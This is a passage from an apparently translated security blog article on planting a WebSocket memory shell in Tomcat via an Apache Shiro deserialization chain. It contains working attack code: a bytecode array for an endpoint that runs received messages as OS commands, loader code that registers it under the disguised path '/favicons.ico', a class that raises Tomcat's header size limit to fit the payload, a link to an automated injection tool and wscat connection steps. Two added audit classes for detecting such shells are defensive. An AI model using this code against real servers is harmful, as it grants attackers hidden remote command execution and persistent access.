0, -122, 
0, -121, 7, 0, -120, 12, 0, -119, 0, -118, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 51, 0, -117, 7, 0, 121, 12, 0, -116, 0, -115, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 122, 12, 0, -114, 0, -113, 12, 0, -112, 0, -111, 12, 0, -110, 0, 38, 12, 0, -109, 0, -113, 12, 0, -108, 0, -106, 1, 0, 4, 77, 83, 71, 58, 12, 0, -112, 0, -105, 12, 0, -104, 0, -103, 7, 0, -101, 12, 0, -100, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, -99, 0, 38, 1, 0, 30, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 73, 110, 116, 101, 114, 114, 117, 112, 116, 101, 100, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 49, 0, 50, 1, 0, 17, 99, 111, 109, 47, 87, 101, 98, 83, 111, 99, 107, 101, 116, 95, 99, 109, 100, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, -98, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 
97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 16, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 1, 0, 4, 82, 79, 79, 84, 1, 0, 18, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 111, 99, 97, 108, 101, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 
1, 0, 45, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 8, 116, 111, 83, 116, 114, 105, 110, 103, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 7, 0, -97, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 32, 0, 33, 0, 1, 0, 34, 0, 1, 0, 2, 0, 35, 0, 36, 0, 0, 0, 4, 0, 1, 0, 37, 0, 38, 0, 1, 0, 39, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 42, 0, 43, 0, 0, 0, 1, 0, 44, 0, 45, 0, 2, 0, 39, 0, 0, 0, 86, 0, 2, 0, 3, 0, 0, 0, 16, 42, 43, -75, 0, 2, 42, -76, 0, 2, 42, -71, 0, 3, 2, 0, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 14, 0, 3, 0, 0, 0, 15, 0, 5, 0, 16, 0, 15, 0, 17, 0, 41, 0, 0, 0, 32, 0, 3, 0, 0, 0, 16, 0, 42, 0, 43, 0, 0, 0, 0, 0, 16, 0, 35, 0, 36, 0, 1, 0, 0, 0, 16, 0, 46, 0, 47, 0, 2, 0, 48, 0, 0, 0, 9, 2, 0, 35, 0, 0, 0, 46, 0, 0, 0, 1, 0, 49, 0, 50, 0, 2, 0, 39, 0, 0, 1, -67, 0, 5, 0, 7, 0, 0, 0, -79, 18, 4, -72, 0, 5, -78, 0, 6, -74, 0, 7, 18, 8, -74, 0, 9, 61, 28, -103, 0, 31, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, -89, 0, 28, -72, 0, 10, 6, -67, 0, 11, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 14, 78, 45, -74, 
0, 15, 58, 4, -69, 0, 16, 89, -73, 0, 17, 58, 5, 25, 4, -74, 0, 18, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 19, 87, -89, -1, -21, 25, 4, -74, 0, 20, 45, -74, 0, 21, 87, 42, -76, 0, 2, -71, 0, 22, 1, 0, -69, 0, 16, 89, -73, 0, 17, 18, 23, -74, 0, 24, 25, 5, -74, 0, 25, -74, 0, 24, -74, 0, 25, -71, 0, 26, 2, 0, -89, 0, 16, 77, 44, -74, 0, 28, -89, 0, 8, 77, 44, -74, 0, 30, -79, 0, 2, 0, 0, 0, -96, 0, -93, 0, 27, 0, 0, 0, -96, 0, -85, 0, 29, 0, 3, 0, 40, 0, 0, 0, 74, 0, 18, 0, 0, 0, 22, 0, 17, 0, 24, 0, 21, 0, 25, 0, 49, 0, 27, 0, 74, 0, 30, 0, 80, 0, 31, 0, 89, 0, 33, 0, 101, 0, 34, 0, 113, 0, 36, 0, 118, 0, 37, 0, 123, 0, 38, 0, -96, 0, 43, 0, -93, 0, 39, 0, -92, 0, 40, 0, -88, 0, 43, 0, -85, 0, 41, 0, -84, 0, 42, 0, -80, 0, 44, 0, 41, 0, 0, 0, 102, 0, 10, 0, 46, 0, 3, 0, 51, 0, 52, 0, 3, 0, 17, 0, -113, 0, 53, 0, 54, 0, 2, 0, 74, 0, 86, 0, 51, 0, 52, 0, 3, 0, 80, 0, 80, 0, 55, 0, 56, 0, 4, 0, 89, 0, 71, 0, 57, 0, 58, 0, 5, 0, 97, 0, 63, 0, 59, 0, 60, 0, 6, 0, -92, 0, 4, 0, 61, 0, 62, 0, 2, 0, -84, 0, 4, 0, 61, 0, 63, 0, 2, 0, 0, 0, -79, 0, 42, 0, 43, 0, 0, 0, 0, 0, -79, 0, 64, 0, 65, 0, 1, 0, 66, 0, 0, 0, 46, 0, 7, -4, 0, 49, 1, -4, 0, 24, 7, 0, 67, -3, 0, 14, 7, 0, 68, 7, 0, 69, -4, 0, 23, 1, -1, 0, 49, 0, 2, 7, 0, 70, 7, 0, 71, 0, 1, 7, 0, 72, 71, 7, 0, 73, 4, 0, 48, 0, 0, 0, 5, 1, 0, 64, 0, 0, 16, 65, 0, 49, 0, 74, 0, 2, 0, 39, 0, 0, 0, 51, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 11, -74, 0, 31, -79, 0, 0, 0, 2, 0, 40, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 41, 0, 0, 0, 12, 0, 1, 0, 0, 0, 9, 0, 42, 0, 43, 0, 0, 0, 48, 0, 0, 0, 5, 1, 0, 64, 16, 0, 0, 3, 0, 75, 0, 0, 0, 2, 0, 78, 0, 79, 0, 0, 0, 2, 0, 80, 0, 77, 0, 0, 0, 18, 0, 2, 0, 34, 0, 119, 0, 76, 6, 9, 0, 111, 0, -102, 0, -107, 6, 9};
        try {
            Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            method.setAccessible(true);
            clazz = (Class) method.invoke(cl,bytes,0,bytes.length); // define the endpoint class from the bytecode above
                /*
                        Obtain the current StandardContext
                        Obtain the ServerContainer from the StandardContext
                        Define a malicious class and create a ServerEndpointConfig that assigns it a URI path
                        Call ServerContainer.addEndpoint to register the ServerEndpointConfig
                */
            String urlPath = "/favicons.ico";
            ServerEndpointConfig config = ServerEndpointConfig.Builder.create(clazz,urlPath).build(); // step 3
            WsServerContainer container = (WsServerContainer) standardContext.getServletContext().getAttribute(ServerContainer.class.getName()); // step 2
            if(container.findMapping(urlPath)==null){
                container.addEndpoint(config); // step 4
            }
        } catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) {
            e.printStackTrace();
        } catch (DeploymentException e) {
            e.printStackTrace();
        }


    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}
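The four steps above register an endpoint class that exists only in memory: it came from defineClass, so no .class file backs it and its code source has no location. As an added defender-side example (not part of the article or of the author's tool), the following audit walks the endpoints registered in the webapp's ServerContainer and flags exactly those traits. It assumes Tomcat 8.5/9 with javax.websocket, reads the private fields configExactMatchMap, configTemplateMatchMap and config of WsServerContainer by reflection (field names are an assumption for those versions; fields that are absent are skipped), and is meant to be called from a diagnostic servlet or JSP that supplies its ServletContext.

```java
import java.lang.reflect.Field;
import java.security.CodeSource;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

import javax.servlet.ServletContext;
import javax.websocket.server.ServerContainer;
import javax.websocket.server.ServerEndpoint;
import javax.websocket.server.ServerEndpointConfig;

/** Lists registered WebSocket endpoints and flags classes with no origin on disk. */
public final class WebSocketEndpointAudit {

    /** One audited endpoint. */
    public static final class Finding {
        public final String path;
        public final String endpointClass;
        public final boolean hasCodeSourceLocation; // false for classes produced by defineClass()
        public final boolean classFileOnClasspath;  // false when no .class resource backs the class
        public final boolean annotated;             // @ServerEndpoint present (programmatic endpoints lack it)

        Finding(String path, Class<?> ep) {
            this.path = path;
            this.endpointClass = ep.getName();
            CodeSource cs = ep.getProtectionDomain().getCodeSource();
            this.hasCodeSourceLocation = cs != null && cs.getLocation() != null;
            ClassLoader cl = ep.getClassLoader();
            this.classFileOnClasspath = cl != null
                    && cl.getResource(ep.getName().replace('.', '/') + ".class") != null;
            this.annotated = ep.isAnnotationPresent(ServerEndpoint.class);
        }

        /** A registered endpoint whose class has no file behind it was defined at runtime. */
        public boolean suspicious() {
            return !hasCodeSourceLocation || !classFileOnClasspath;
        }

        @Override
        public String toString() {
            return path + " -> " + endpointClass
                    + (suspicious() ? "  [SUSPICIOUS: no class file backs this endpoint]" : "");
        }
    }

    public static List<Finding> audit(ServletContext sc) throws ReflectiveOperationException {
        List<Finding> out = new ArrayList<>();
        Object container = sc.getAttribute(ServerContainer.class.getName());
        if (container == null) {
            return out; // WebSocket support was never initialised for this context
        }
        // Assumed private map names of WsServerContainer in Tomcat 8.5/9; skipped when absent
        for (String field : new String[] {"configExactMatchMap", "configTemplateMatchMap"}) {
            Object map = readField(container, field);
            if (map instanceof Map) {
                collect((Map<?, ?>) map, out);
            }
        }
        return out;
    }

    private static void collect(Map<?, ?> map, List<Finding> out) throws ReflectiveOperationException {
        for (Object v : map.values()) {
            if (v instanceof Map) {
                collect((Map<?, ?>) v, out); // the template map is nested one level deeper
            } else {
                // ExactPathMatch / TemplatePathMatch keep the registration in a "config" field (assumed)
                Object cfg = readField(v, "config");
                if (cfg instanceof ServerEndpointConfig) {
                    ServerEndpointConfig c = (ServerEndpointConfig) cfg;
                    out.add(new Finding(c.getPath(), c.getEndpointClass()));
                }
            }
        }
    }

    /** Reads a private field from the object's class or any superclass; null when absent. */
    private static Object readField(Object target, String name) throws ReflectiveOperationException {
        for (Class<?> k = target.getClass(); k != null; k = k.getSuperclass()) {
            try {
                Field f = k.getDeclaredField(name);
                f.setAccessible(true);
                return f.get(target);
            } catch (NoSuchFieldException ignored) {
                // try the superclass
            }
        }
        return null;
    }
}
```

Legitimate programmatic endpoints also lack @ServerEndpoint, so the annotation alone is not a verdict; what deserves attention is a registered path whose class has no file behind it, particularly on a path that masquerades as a static resource such as /favicons.ico. Because this runs inside the same JVM it could itself be interfered with; a heap dump inspected offline gives the same answer with more confidence.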

This class is loaded directly and placed into _bytecodes; that is really the first half of the CC3 (CommonsCollections3) chain, and what follows is the CB (CommonsBeanutils) chain.

Finally, encrypt the payload; this needs no further explanation.

But there is a well-known obstacle: Shiro's header length check. So here I reuse code shared earlier by others to enlarge the header size.

package com;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

@SuppressWarnings("all")
public class TomcatHeaderSize extends AbstractTranslet {

    static {
        try {
            java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
            java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
            java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
            java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");
            java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler", (Class<?>[]) null);
            contextField.setAccessible(true);
            headerSizeField.setAccessible(true);
            serviceField.setAccessible(true);
            requestField.setAccessible(true);
            getHandlerMethod.setAccessible(true);
            org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
                    (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
            org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
            org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
            for (int i = 0; i < connectors.length; i++) {
                // "http".length() == 4: only plain HTTP connectors are touched
                if (4 == connectors[i].getScheme().length()) {
                    org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                    if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
                        Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
                        for (int j = 0; j < classes.length; j++) {
                            // match org.apache.coyote.AbstractProtocol$ConnectionHandler by the length of its name
                            if (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {
                                java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
                                java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                                globalField.setAccessible(true);
                                processorsField.setAccessible(true);
                                org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, (Object[]) null));
                                java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                                for (int k = 0; k < list.size(); k++) {
                                    org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
                                    // 409600000 is the new header buffer size for processors that already exist
                                    headerSizeField.set(tempRequest.getInputBuffer(),409600000);
                                }
                            }
                        }
                        // 409600000 is the new maxHttpHeaderSize of the connector itself
                        ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(409600000);
                    }
                }
            }
        } catch (Exception e) {
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}
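The class above raises maxHttpHeaderSize on the running connector, and the buffer size of already-created processors, so that a payload larger than Tomcat's header limit is accepted. As an added operational check (not from the article), the following reads the effective limit of every HTTP/1.1 connector through Tomcat's public API and compares it with the configured value. Tomcat 9 is assumed; TOMCAT_DEFAULT_MAX_HEADER is the stock default, so pass the value from your own server.xml instead when it differs.

```java
import java.util.ArrayList;
import java.util.List;

import org.apache.catalina.Context;
import org.apache.catalina.Engine;
import org.apache.catalina.Service;
import org.apache.catalina.connector.Connector;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.coyote.ProtocolHandler;
import org.apache.coyote.http11.AbstractHttp11Protocol;

/** Compares each HTTP/1.1 connector's live maxHttpHeaderSize with the configured value. */
public final class HeaderSizeAudit {

    /** Tomcat's default maxHttpHeaderSize in bytes. */
    public static final int TOMCAT_DEFAULT_MAX_HEADER = 8192;

    public static final class Report {
        public final String connector;
        public final int maxHttpHeaderSize;
        public final int expected;

        Report(String connector, int actual, int expected) {
            this.connector = connector;
            this.maxHttpHeaderSize = actual;
            this.expected = expected;
        }

        /** True when the live value no longer matches what the operator configured. */
        public boolean tampered() {
            return maxHttpHeaderSize != expected;
        }

        @Override
        public String toString() {
            return connector + " maxHttpHeaderSize=" + maxHttpHeaderSize
                    + (tampered() ? "  [MISMATCH: expected " + expected + "]" : "");
        }
    }

    /** Audits every connector of the Service that owns the given web application Context. */
    public static List<Report> audit(Context ctx, int expected) {
        // Context -> Host -> Engine; the Engine knows its Service and the Service its Connectors
        Engine engine = (Engine) ctx.getParent().getParent();
        Service service = engine.getService();
        List<Report> out = new ArrayList<>();
        for (Connector c : service.findConnectors()) {
            ProtocolHandler ph = c.getProtocolHandler();
            if (ph instanceof AbstractHttp11Protocol) {
                int actual = ((AbstractHttp11Protocol<?>) ph).getMaxHttpHeaderSize();
                out.add(new Report(c.getScheme() + ":" + c.getPort(), actual, expected));
            }
        }
        return out;
    }

    /** Resolves the calling web application's Context from its class loader, as the article does. */
    public static Context currentContext() {
        ClassLoader cl = Thread.currentThread().getContextClassLoader();
        if (!(cl instanceof WebappClassLoaderBase)) {
            throw new IllegalStateException("not running inside a Tomcat web application");
        }
        return ((WebappClassLoaderBase) cl).getResources().getContext();
    }

    /** Convenience entry point for a diagnostic servlet or JSP. */
    public static List<Report> auditCurrent(int expected) {
        return audit(currentContext(), expected);
    }
}
```

A limit far above 8192 that nobody configured is a strong signal on its own. This check covers only the connector-level setting; the per-processor buffer that the class above also rewrites is not visible through the public API, and restarting Tomcat restores both to the configured values.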

To recap the procedure: enlarge the header size ---> generate the CB chain and encrypt it once.

For convenience I wrote this up as a small tool that simply automates what I described above; readers can study it for themselves.

https://gitee.com/state123/shiro_-web-socket/tree/master

Injection succeeds directly. The tool automatically enlarges the header size and injects the WebSocket memory shell; it obviously cannot compete with professional tools, so other gadget chains and the key are left for readers to modify themselves.

The WebSocket memory shell is now in place, but how do we connect to it?

Just use the wscat tool. Remember that the scheme must change from the familiar http:// to ws://.

Closing remarks

If you have not looked at the Shiro vulnerability before, see my earlier article:

https://www.freebuf.com/articles/web/331961.html

wscat can be downloaded and installed from the internet; it depends on a Node.js environment, so install that too.

The tool provided in this article is for learning and reference only! I bear no responsibility for any consequences!

If this seems too complex, first read up on plain WebSocket memory shells, then study Shiro WebSocket memory shell injection; the difference is not large:

https://blog.csdn.net/qq_53263789/article/details/126224860

# Vulnerability analysis # Java security # Memory shell
This article represents the independent views of Met32; reproduction without authorization is prohibited.